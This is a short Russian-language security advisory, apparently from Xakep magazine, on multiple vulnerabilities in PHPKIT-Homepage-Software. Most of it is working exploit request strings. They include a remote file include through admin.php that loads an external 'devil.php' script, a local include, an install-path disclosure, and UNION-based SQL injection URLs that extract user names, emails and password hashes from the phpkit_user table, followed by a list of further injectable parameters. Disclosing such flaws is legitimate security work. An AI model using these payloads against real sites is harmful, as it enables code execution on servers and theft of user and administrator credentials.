Множественные уязвимости в PHPKIT

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Несколько уязвимостей обнаружено в PHPKIT-Homepage-Software. Удаленный атакующий может выполнить произвольный PHP код, выполнить нападение SQL инъекции и раскрыть инсталляционный путь. 

Возможен локальный инклуд *.php : 

http://hanter/include.php?path= /home/devil.php

Возможнен инклуд в системе администратирования: 

http://hanter/admin/admin.php?path= http://host/devil.php

Раскрытие инсталляционного пути: 

http://hanter/include.php?path= update_1602.php

Возможность SQL инъекции: + Получение md5 хеша пароля пользователей и администратора(ов): 

http://hanter/include.php?path=comment/comment.php&comcat= gb&subid=1'+UNION+SELECT+null,null,user_email,
user_name,null,null,null,null,user_pw,null,null,
null+FROM+phpkit_user+WHERE+user_id='1

http://hanter/include.php?path=login/member.php& order=nick&usernick='+UNION+SELECT+null,null,
null,null,null, null,user_pw,null,null,user_name,null,null,
null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null+FROM +phpkit_user+WHERE+user_name+LIKE+'%

http://hanter/include.php?path=comment/comment.php& subid=1&comcat=gb'+UNION+SELECT+
null,null,null,null, user_name,null,user_pw,null+FROM+phpkit_ user+WHERE+user_id='1

+

http://hanter/include.php?path= login/userinfo.php&id='sql-inj
http://hanter/include.php?path= content/overview.php&type=1&letter='sql-inj
http://hanter/include.php?path= forum/showcat.php&catid='sql-inj
http://hanter/include.php?path= login/imcenter.php&userid='sql-inj
http://hanter/include.php?newposttime= 'sql-inj&path=forum/main.php
http://hanter/include.php?path= forum/showthread.php&threadid=3'sql-inj
http://hanter/include.php?path= login/mailer.php&userid=1'sql-inj
http://hanter/include.php?path= content/download.php&contentid=14'sql-inj